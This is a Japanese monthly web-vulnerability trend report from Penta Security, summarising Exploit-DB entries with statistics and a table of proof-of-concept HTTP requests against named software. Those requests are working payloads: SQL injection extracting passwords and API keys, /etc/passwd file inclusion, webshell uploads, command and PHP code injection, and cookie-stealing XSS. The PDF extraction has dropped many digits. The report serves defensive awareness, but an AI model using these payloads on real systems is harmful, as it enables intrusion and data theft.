最新 Web トレンドレポート (06.06) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年

Size: px
Start display at page:

Download "最新 Web トレンドレポート (06.06) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年"

Transcription

1 06.06

2 最新 Web トレンドレポート (06.06) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 6 月は 上半期 Exploit-DB のの中で最も多くのが報告されました それによって 攻撃の種類も多様に報告されました SQL Injection XSS などの攻撃報告数が最も多かったですが 新しい攻撃方法や攻撃パターンでの特異点は発見されませんでした SQL Injection のほとんどは 攻撃の難易度や危険度が低いが多数であり 単にがあるかないかを確認する攻撃パターンでした しかし 該当の攻撃パターンが成功し が発見されたプログラムは追加的な攻撃が入ってくる恐れがあるので 発見されたページやパラメーターを確認し セキュアコーディングやソフトウェアのアップデートが必須的に求められます SQL Injection のほか PHP Code Injection が発見された数が 3 位と報告されました PHP Code Injection は SQL Injection に比べて 相対的に危険度が低いと分類されますが 多くの Web サイトが PHP で構成されているので 攻撃頻度が高いです PHP Code Injection にさらされないように fputs と fwrite など PHP で実際的に使われる関数と命令語はあらかじめ定義して使うことが求められます. 別件数カテゴリ リモートファイル挿入 (Remote File Inclusion:RFI) コマンドインジェクション (Command Injection) ファイルアップロード (File Upload) ローカルファイル挿入 (Local File Inclusion:LFI) ディレクトリトラバーサル (Directory Traversal) コード インジェクション (Code Injection) クロスサイトスクリプティング (Cross Site Scripting : XSS) 件数 SQL インジェクション 7 (SQL Injection) 合計 49 別件数 危険度別件数 危険度 件数 割合 早急対応要 5 0% 高 44 90% 合計 49 00% 危険度別分類 5 早急対応要 高 攻撃実行の難易度別件数 難易度 件数 割合 難 4% 中 5 3% 易 3 65% 合計 49 00% 攻撃実行の難易度別件数 5 3 難 中 易 4. 主なソフトウェア別発生件数ソフトウェア名 Wordpress Nagios snews CMS XuezhuLi FileSharing Kagao Cisco EPC 398 BigTree CMS Notilus Travel Solution Software SugarCRM Drale DBTableViewer Electroweb Viart MyLittleForum jbfilemanager Airia OPAC KpwinSQL Relay Ajax Directory Manager Concrete5 Alibaba Clone BB Script rconfig ibilling Ultrabenosaurus ChatBoard Apache Tiki-Wiki CMS Liferay CE Vicidial Ktools Dokeos wwiki 合計 件数 主なソフトウェア別発生件数 Wordpress Nagios snews CMS XuezhuLi FileSharing Kagao Cisco EPC 398 BigTree CMS Notilus Travel Solution Software SugarCRM Drale DBTableViewer Electroweb Viart MyLittleForum jbfilemanager Airia OPAC KpwinSQL Relay Ajax Directory Manager Concrete5 Alibaba Clone BB Script rconfig ibilling Ultrabenosaurus ChatBoard Apache Copyright 06 Penta Security Systems Inc. All rights reserved

3 最新 Web トレンドレポート (06.06) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です 危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するか あるいはクライアントに 次被害を及ぼす中 : 情報漏洩攻撃実行難易度分類基準難 : 複数のを突いた攻撃パターン 対象のシステムの重要な情報を取得するため 高度な攻撃コードを採用したパターン 知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが 迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン 複数回トライするも 既知の攻撃コードを採用したパターンのいずれかに該当する Copyright 06 Penta Security Systems Inc. All rights reserved

4 最新 Web トレンドレポート (06.06) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です Code Injection 易高 index.php Remote Command Execution POST /%0.0.3./ajaxexplorer/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/ strpage=control/file/editor&strpath=p:/&strfile=terminal. php&strtext=<?php exec($_get["cmd"]);?> XSS 易高 index.php XSS POST /%0.0.3./ajaxexplorer/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/ strpage=control/file/editor&strpath=p:/&strfile=terminal. php&strtext=<script>alert(666)</script> File Upload 易高 POST / HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Relay Ajax Directory Manager Content-Type: multipart/form-data; boundary= relayb ,.5., dd009908f / File Upload dd009908f Content-Disposition: form-data; name="file"; filename="info.php" Content-Type: application/octet-stream Relay Ajax Directory Manager Relay Ajax Directory Manager relayb ,.5.,.5.3 <? phpinfo();?> dd009908f XSS 易高 Liferay CE < 6. CE GA6 - /liferay/web/guest/ XSS POST /liferay/web/guest/home?p_p_id=58&p_p_lifecycle=&p_ p_state= maximized&p_p_mode=view&_58_struts_action=%flog in%fcreate_account HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 Liferay CE Liferay CE < 6. CE GA6 _58_firstName=%%3E%3Cscript%3Ealert%8%7xs s%7%9%3c% SQL Injection 中早急対応要 SecurityCheck Extension index.php SQL Injection /index.php?option='or(extractvalue(,concat(0x3a,(selec t(database())))))=' SecurityCheck Extension SQL Injection 中早急対応要 Nagios XI nagiosim.php SQL Injction /nagiosxi/includes/components/nagiosim/nagiosim.php? mode=resolve&host=a&service='+and+(select++fro M(SELECT+COUNT(*),CONCAT(' APIKEY ',(SELECT+MID( (IFNULL(CAST(backend_ticket+AS+CHAR),0x0)),,54)+F ROM+xi_users+WHERE+user_id%3d+LIMIT+0,),' APIK EY ',FLOOR(RAND(0)*))x+FROM+INFORMATION_SCHE MA.CHARACTER_SETS+GROUP+BY+x)a)+OR+' Nagios Nagios XI 5..7 Copyright 06 Penta Security Systems Inc. All rights reserved

5 最新 Web トレンドレポート (06.06) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です LFI 易高 rconfig downloadfile.php LFI /lib/crud/downloadfile.php?download_file=/etc/passwd rconfig rconfig SQL Injection 難早急対応要 Notilus Travel Solution Software 0 R3 - Password.aspx SQL Injection POST /company/profilv4/password.aspx HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 ACTION=&H_OLD=mypass'%3bdeclare%0@q%0varc har(99)%3bset%0@q%3d'\\\\testdomain.mydo'% b'main.com\\vps'%3b%0exec%0master.dbo.xp_d irtree%0@q%3b-- %0&H_NEW=%7+or+%7%7%3D%7&H_NEW =%7+or+%7%7%3D%7 Notilus Travel s Travel Solution So Solution Software 0 R SQL Injection 中早急対応要 POST /wp-admin/adminajax.php?action=populate_download_edit_form HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 WordPress Double Opt-In for Download Plugin adminajax.php SQL Injection Chrome/ Safari/535.7 Wordpress WordPress Double Opt-In for Download Plugin.0. id=0 UNION SELECT,, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID= RFI 易高 WordPress WP Mobile Detector Plugin resize.php RFI 脆弱 性 /wp-content/plugins/wp-mobiledetector/resize.php?src= Wordpress WordPress WP Mobile Detector Plugin SQL Injection 易高 Electroweb Online Examination System.0 - showtest.php SQL Injection /showtest.php?subid=%0and%0=-- Electroweb Electroweb Online Examination System Command Injection 中高 Nagios XI nagiosim.php Command Injection /nagiosxi/includes/components/nagiosim/nagiosim.php?m ode=update&token=<apitoken>&incident_id=<valid incident id>&title=title'; touch /tmp/file; echo&status= Nagios Nagios XI Command Injection 中高 Nagios XI graphapi.php Command Injection /nagiosxi/includes/components/perfdata/graphapi.php?ho st=<any monitoredhost IP>&start=&end=; touch /tmp/file; Nagios Nagios XI 5..7 Copyright 06 Penta Security Systems Inc. All rights reserved

6 最新 Web トレンドレポート (06.06) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です XSS 易高 /continuum/security/useredit_confirmadminpassword.act ion?useradminpassword=&username=guest&user.userna me=guest<script>alert(document.cookie)</script>&user.f user.timestampaccountcreation=&user.timestamplastlo gin=&user.timestamplastpasswordchange=&user.locked =false&user.passwordchangerequired=false&method:co Apache Continuum.4. - nfirmadminpassword=submit&cancel=cancel< useredit_confirmadminpasswor.0.0.:8080/continuum/security/useredit_confirmadminp d.action XSS assword.action?useradminpassword=&username=guest &user.username=guest%3cscript%3ealert(document.coo kie)%3c/script%3e&user.fullname=guest&user. =bl ah@procheckup.com&user.password=password&user.co nfirmpassword=password&user.timestampaccountcreati on=&user.timestamplastlogin=&user.timestamplastpass wordchange=&user.locked=false&user.passwordchange Required=false&method:confirmAdminPassword=Submit &cancel=cancel> Apache Apache Continuum LFI 易高 WordPress Simple Backup /wpadmin/tools.php?page=backup_manager&download_bac Plugin.7. - tools.php LFI 脆 弱性 kup_file=oldbackups/../../../../../../etc/passwd WordPress WordPress Simple Backup Plugin XSS 易高 Cisco EPC /goform/administration XSS POST /goform/administration HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 working_mode=0&sysname=<script>alert('xss')</script> &syspasswd=home&sysconfirmpasswd=home&save=sav e+settings&preworkingmode=&h_wlan_enable=enable &h_user_type=common Cisco EPC 398 Cisco EPC XSS 易高 Cisco EPC /goform/wclientmaclist POST /goform/wclientmaclist HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 sortwireless=mac&h_sortwireless=mac" onmouseover=alert() x="y Cisco EPC 398 Cisco EPC SQL Injection 中高 Drale DBTableViewer /vul_test/dbtableviewer/ SQL Injection /vul_test/dbtableviewer/?orderby=nice_name%0rlike %0(SELECT%0(CASE%0WHEN%0(697=697)% 0THEN%00x6e f6e66d65%0ELSE%00x 8%0END))&sort=DESC&sort=DESC Drale DBTableViewer Drale DBTableViewer SQL Injection 易高 PayPlans index.php?option=com_payplans&group_id=%0and% (com_payplans) Extension =-- - index.php SQL Injection PayPlans (com_payplans) Extension Copyright 06 Penta Security Systems Inc. All rights reserved

7 最新 Web トレンドレポート (06.06) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です File Upload 易高 POST /admin/admin_fm_upload_files.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Viart Shopping Cart Content-Type: multipart/form-data; boundary= admin_fm_upload_files.php File dd009908f Upload dd009908f Content-Disposition: form-data; name="newfile_0"; filename="shell.php" Content-Type: application/octet-stream Viart Viart Shopping Cart 5.0 <? phpinfo();?> dd009908f Directory Traversal 易高 jbfilemanager - jbfm.php Directory Traversal /vul_test/jbfilemanager/jbfm/jbfm.php?act=open&path= /../../../../../../../../../etc/ jbfilemanager jbfilemanager XSS 易高 Booking System < eventlist.php XSS /scripts/booking/eventlist.php?serviceid=337%%0 onmouseover=%alert() Booking System < SQL Injection 易高 En Masse (com_enmasse) Component 5. /component/enmasse/term?tmpl=component&id=% /component/enmasse/ and%0=-- SQL Injection En Masse (com_enmasse) Component SQL Injection 中高 Dokeos.. - slideshow.php SQL Injection /dokeos-../main/document/slideshow.php?cidreq=3&curdir path=%7%0and%0(select%0*%0from%0( SELECT(SLEEP(5)))Pfag)%0AND%0%7NFwV%7= %7NFwV&slide_id=all Dokeos Dokeos SQL Injection 易高 POST /ajax/checkchangeavailability.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Booking System < Chrome/ Safari/ eventlist.php SQL Injection Booking System < 5.5 id=' AND SLEEP(5) AND 'WAlE'='WAlE Copyright 06 Penta Security Systems Inc. All rights reserved

8 最新 Web トレンドレポート (06.06) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です XSS 易高 wwiki - index.php XSS POST /vul_test/wwiki/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 wwiki wwiki page=xss&newtext=afsd%3cimg+src%3d%h%+o nerror%3dalert%845%9%3eaa&action=save XSS 易高 Ultrabenosaurus ChatBoard - chat.php XSS POST /vul_test/chatboard/ original/chat.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 Ultrabenosaurus ChatBoard Ultrabenosaurus ChatBoard msg=654<img src="z" onerror=zz>asd Code Injection 中高 /tikicalendar.php?viewmode=%7;%0$z=fopen%8%shell.p Tiki-Wiki CMS Calendar 4.,.5 LTS, 9. LTS, and hp%,%7w%7%9;fwrite%8$z,file_get_contents%8% tiki-calendar.php Code Injection ;%7 Tiki-Wiki CMS Tiki-Wiki CMS Calendar 4.,.5 LTS, 9. LTS, and XSS 中高 Vicidial. - admin.php XSS POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 ADD=&DB=&script_id=tests&script_name=<scrip t>alert('xss!'</script>&script_comments=test& active=y&user_group=---all--- &selectedfield=fullname&script_text=<script>alert('xss!'</script>&submit=submit Vicidial Vicidial File Upload 易高 Airia - editor.php File Upload POST /editor.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f Airia Airia dd009908f Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream <?php echo 'Airia Webshell Exploit';#{shell};?> dd009908f SQL Injection 易高 BT Media (com_bt_media) Component - index.php SQL Injection /index.php?option=com_bt_media&view=list&categories[ 0]=%0and%0=--&Itemid=34 BT Media (com_bt_media) Component Copyright 06 Penta Security Systems Inc. All rights reserved

9 最新 Web トレンドレポート (06.06) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です Command Injection 易 高 POST /snews.7./?action=process&task=admin_article&id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW /snews.7./ Command Inje Chrome/ Safari/535.7 snews CMS snews CMS.7. text=[func]system: :"calc.exe"[/func] XSS 易高 snews CMS.7. - /snews.7./ XSS POST /snews.7./?action=process&task=admin_article&id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 snews CMS snews CMS.7. text=[include]<script>alert(document.cookie)</script>[/in clude] SQL Injection 易高 Publisher Pro (com_publisher) Component - index.php SQL Injection /index.php?option=com_publisher&view=issues&itemid= %0and%0=--&lang=en Publisher Pro (com_publisher) Component Directory Traversal 中高 - api.php Directory Traversal /vul_test//api.php?callback=jquery _ &type=get&mode=0&fol der=li4vli4vli4vli4vli4vli4vzxrjlw==&_= Directory Traversal 易高 XuezhuLi FileSharing - download.php Directory Traversal /vul_test/filesharing/download.php?file_name=../../../../.. /../../../../../../../../etc/passwd XuezhuLi FileSharing XuezhuLi FileSharing LFI 易高 Alibaba Clone BB Script - show_page.php LFI /show_page.php?page=../configure.php%00 Alibaba Clone BB Script Alibaba Clone BB Script XSS 易高 - api.php XSS /vul_test//api.php?callback=jquery _ }}c07%3Cscript%3E alert%8%9%3c%fscript%3ecfea&type=get&mod e=0&_= Copyright 06 Penta Security Systems Inc. All rights reserved

10 最新 Web トレンドレポート (06.06) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です Directory Traversal 易高 XuezhuLi FileSharing - /vul_test/filesharing/viewing.php?file_name=../../../../../.. viewing.php Directory Traversal /../../../../../../../etc/passwd XuezhuLi FileSharing XuezhuLi FileSharing SQL Injection 難早急対応要 BigTree CMS /site/index.php/admin/pages/up date/ SQL Injection POST /site/index.php/admin/pages/update/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 page=' and 6=3 or =+(SELECT and ROW(,)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHA R(5),CHAR(00),CHAR(05),CHAR(08),CHAR(0),CH AR(09),CHAR(09),CHAR(97),0x3a,FLOOR(RAND(0)*) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' BigTree CMS BigTree CMS XSS 中高 ibilling index.php XSS POST /ibilling/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 account=%%3e%3cscript%3ealert()%3c%fscript %3E&company=%%3E%3Cscript%3Ealert()%3C% Fscript%3E& =test%40yahoo.com&phone=%% 3E%3Cscript%3Ealert(4)%3C%Fscript%3E&address= %%3E%3Cscript%3Ealert(5)%3C%Fscript%3E&city =%%3E%3Cscript%3Ealert(6)%3C%Fscript%3E&st ate=%%3e%3cscript%3ealert(7)%3c%fscript%3e &zip=%%3e%3cscript%3ealert(8)%3c%fscript%3 E&country=TR&tags%5B%5D=web_development%% 3E%3Cscript%3Ealert(9)%3C%Fscript%3E ibilling ibilling Code Injection 中高 POST /install/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 MyLittleForum Chrome/ Safari/535.7 /install/index.php Code Injection MyLittleForum MyLittleForum.3.5 database=';?><?php echo passthru('/bin/cat /etc/passwd');' SQL Injection 中高 Kagao cat.php SQL Injection /cat.php?id= %%0union%0all%0selec t%0concat%80x7e%c0x7%cunhex%8hex%8 cast%8database%8%9%0as%0char%9%9% 9%C0x7%C0x7e%9--%0a Kagao Kagao Code Injection 易高 SugarCRM index.php Code Injection /index.php?module=connectors&action=runtest&source_ id=ext_rest_insideview&ext_rest_insideview_[%7.phpinfo(). %7]= SugarCRM SugarCRM Copyright 06 Penta Security Systems Inc. All rights reserved

11 最新 Web トレンドレポート (06.06) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です XSS 中 高 /cat.php?id=0&pricestart=0&room=&flache=&price=&z ulassung=&kilometer=&kraftstoff=&id3=0&suche=%% Kagao cat.php XSS 3E%3Cscript%3Ealert%8%7n4tural%7%9%3B%3C%Fs cript%3e&id=0&suchewo=&umkreis=0 Kagao Kagao SQL Injection 易高 OPAC KpwinSQL - zaznam.php SQL Injection /zaznam.php?detail_num=%0and%0=-- OPAC KpwinSQL OPAC KpwinSQL LFI 易高 GET /concrete5/index.php HTTP/. Concrete index.php LFI X-Original-Url: /tools/../../index Connection: keep-alive Concrete5 Concrete SQL Injection 中高 WordPress Ultimate Membership Pro Plugin admin-ajax.php SQL Injection POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 action=ihc_preview_user_listing&shortcode=[ihc-listusers filter_by_level="" levels_in="[ihc-list-users filter_by_level="" levels_in="') union all select (SELECT CASE WHEN ($sql) then else *(select table_name from information_schema.tables) end)#" theme="ihctheme_" theme="ihc-theme_ Wordpress WordPress Ultimate Membership Pro Plugin SQL Injection 易高 Ktools Photostore mgr.login.php SQL Injection POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 Ktools Ktools Photostore =%7%0and%0=--;# Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 06.04 最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 月公開された Exploit-DB の分析結果 クロスサイトスクリプティング (Cross

More information

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 06.0 最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 月に公開された Exploit-DB の分析の結果 SQL Injection 攻撃に対する脆弱性報告数が最も多かったです

More information

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB(  より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05 05. EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05 年 月に公開されたExploit-DBの分析結果 Local File Inclusion

More information

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB(  より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 05.09 最新 Web 脆弱性トレンドレポート (05.09) 05.09.0~05.09.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 05 年 9 月は Exploit-DB の分析結果をみると クロスサイトスクリプティング

More information

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB(  より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー 05.07 サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) 05.07.0~05.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 05 年 7 月に公開された Exploit-DB を分析した結果

More information

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site 06.08 サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site Scripting らの攻撃は単にスクリプトを使用したり イメージタグを使用するなどの攻撃難易度や危険度の側面ではレベルの高い攻撃パターンではありませんでした

More information

最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年

最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB(  より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年 08.0 最新 Web 脆弱性トレンドレポート (08.0) 08.0.0~08.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年 月に公開された Exploit DB の脆弱性報告件数は 6 件でした こので最も多くの脆弱性が公開された攻撃は

More information

06.0 サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 月に公開された Exploit-DB の分析結果 クロスサイトスクリプティング (Cross Site Scripting) の攻撃に対する脆弱性報告数が最も多かったです クロスサイトスクリプティング (Cross Site Scripting) 攻撃は 一般的にパラメーター値を利用して攻撃する方法です

More information

205.08 Pluck PHPfileNavigator PhpWiki PHP News Script Nuts Wolf up.time Aruba Mobility Controller サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 205 年 8 月は Exploit-DB の分析結果をみると SQL インジェクション (SQL Injection)

More information

最新 Web トレンドレポート (06.03) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

最新 Web トレンドレポート (06.03) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3 06.03 最新 Web トレンドレポート (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3 月に公開された Exploit-DB の分析結果 Local File Inclusion

More information

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB(  より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ 207.09 サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) 207.09.0~207.09.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 207 年 9 月に公開された Exploit-DB の脆弱性報告件数は

More information

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー 06.07 サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 7 月に公開された Exploit-DB の分析結果 クロスサイトスクリプティング

More information

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5 5.4 EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5年4月は Exploit-DBの分析結果をみると SQLインジェクション攻撃による脆弱性が最も多く報告されました

More information

最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ

最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ 07.0 最新 Web トレンドレポート (07.0) 07.0.0~07.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開された Exploit-DB の脆弱報告件数は 平均的に 他の期間の数よりも 4 倍ほど多かったです

More information

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 2006 12 14 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 2 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions,

More information

サマリー EDB-Report 最新 Web トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチー

